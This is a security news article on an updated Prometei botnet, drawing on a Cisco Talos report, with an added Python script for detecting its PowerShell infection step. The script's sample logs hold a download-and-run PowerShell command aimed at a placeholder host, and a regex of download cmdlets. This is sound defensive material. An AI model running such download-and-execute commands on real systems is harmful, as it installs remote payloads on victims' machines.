13 March 2023

Prometei botnet malware updated with new capabilities to complicate forensic analysis

A new version of a botnet malware called “Prometei” has been spotted that comes with improved infrastructure components and capabilities that automate the operators’ processes and make forensic analysis more difficult.

First observed in 2016, Prometei is a modular botnet with worm-like capabilities that steals credentials and deploys the Monero cryptocurrency miner.

According to a new report from Cisco’s Talos threat research team, Prometei has infected more than 10,000 victims worldwide since November 2022, with a majority of the victims reported in Brazil, Indonesia, and Turkey.

“Talos observed Prometei’s cryptocurrency mining and credential theft activity to be financially motivated and geographically indiscriminate. Its infections are likely opportunistic, targeting vulnerable entities in all regions and industry verticals to support a higher yield of harvested credentials and mining of the Monero cryptocurrency,” the researchers said.

Interestingly, the new version of the malware is designed to avoid attacking Russia, suggesting that the bot’s targeting may have been influenced by the war in Ukraine.

“Prior to Russia’s invasion of Ukraine, the actor avoided targeting Russia and many of its border states, whereas now, they only avoid targeting Russia. This may indicate a desire to limit the infection of and/or communication to any Russian hosts by the botnet’s author, and that previously excluded border states are now fair game,” Cisco Talos noted.

An analysis of the botnet’s execution chain revealed that the Prometei operators have made modifications that automate component and infrastructure updating, complicate defenders’ analysis, and further entrench the actor on victim machines. The execution chain and subsequent actions performed by the botnet were initiated by a malicious PowerShell command that downloaded the primary listening and execution module (sqhost.exe).
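The report describes the infection starting with a PowerShell command that downloads the listening module sqhost.exe. The following added example (not code from the article or from Cisco Talos) shows how a defender might triage PowerShell script-block logs for that pattern. The log format, the hostnames, the URLs and the list of download cmdlets are all constructed assumptions for the example; the only indicator taken from the text is the module name sqhost.exe.

```python
import re
from dataclasses import dataclass, field

# Constructed sample log lines (not real Prometei telemetry). Each line mimics
# a flattened PowerShell script-block log: "<timestamp> host=<name> cmd=<script>".
SAMPLE_LOGS = [
    "2023-03-01T10:00:00Z host=ws01 cmd=Get-ChildItem C:\\Users",
    "2023-03-01T10:05:12Z host=ws02 cmd=powershell -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadFile('http://example.invalid/x','C:\\Windows\\sqhost.exe'); "
    "Start-Process C:\\Windows\\sqhost.exe\"",
    "2023-03-01T10:07:30Z host=ws03 cmd=Invoke-WebRequest -Uri http://example.invalid/u.zip -OutFile C:\\temp\\u.zip",
    "2023-03-01T10:09:00Z host=ws04 cmd=Get-Process sqhost",
]

# Assumed list of common PowerShell download primitives; extend to taste.
DOWNLOAD_RE = re.compile(
    r"\b(DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|"
    r"Start-BitsTransfer|curl|wget)\b",
    re.IGNORECASE,
)
# Module name from the report; ".exe" is optional so "Get-Process sqhost" also matches.
SQHOST_RE = re.compile(r"\bsqhost(\.exe)?\b", re.IGNORECASE)
LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) cmd=(?P<cmd>.*)$")

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


@dataclass
class Finding:
    timestamp: str
    host: str
    severity: str
    reasons: list = field(default_factory=list)
    command: str = ""


def score_command(cmd: str):
    """Return (severity, reasons) for one script block, or (None, []) if benign.

    high   : download primitive AND reference to sqhost  (matches the reported chain)
    medium : download primitive only                     (worth a look, not specific)
    low    : reference to sqhost only                    (e.g. someone inspecting it)
    """
    reasons = []
    dl = DOWNLOAD_RE.search(cmd)
    if dl:
        reasons.append(f"download primitive: {dl.group(1)}")
    if SQHOST_RE.search(cmd):
        reasons.append("references sqhost module")
    if dl and len(reasons) == 2:
        return "high", reasons
    if dl:
        return "medium", reasons
    if reasons:
        return "low", reasons
    return None, []


def parse_line(line: str):
    """Parse one constructed log line into (timestamp, host, command) or None."""
    m = LINE_RE.match(line)
    return (m.group("ts"), m.group("host"), m.group("cmd")) if m else None


def scan(lines):
    """Scan log lines and return Findings sorted by severity (high first)."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # malformed line: skip rather than crash the sweep
        ts, host, cmd = parsed
        severity, reasons = score_command(cmd)
        if severity:
            findings.append(Finding(ts, host, severity, reasons, cmd))
    return sorted(findings, key=lambda f: SEVERITY_RANK[f.severity])


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f.severity.upper():6} {f.timestamp} {f.host}: {'; '.join(f.reasons)}")
```

The severity ladder is the point of the example: a download primitive on its own is common in administration scripts, so it only rates medium, while the combination with the module name reported for this chain is what deserves a prompt look. Pair a rule like this with script-block logging actually enabled on endpoints, otherwise there is nothing to scan.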

The researchers also observed previously undocumented functionality, including an alternative C&C domain generation algorithm (DGA), a self-updating mechanism, and a bundled version of the Apache web server with a web shell that is deployed onto victim hosts, improving the overall technical capabilities of the botnet.
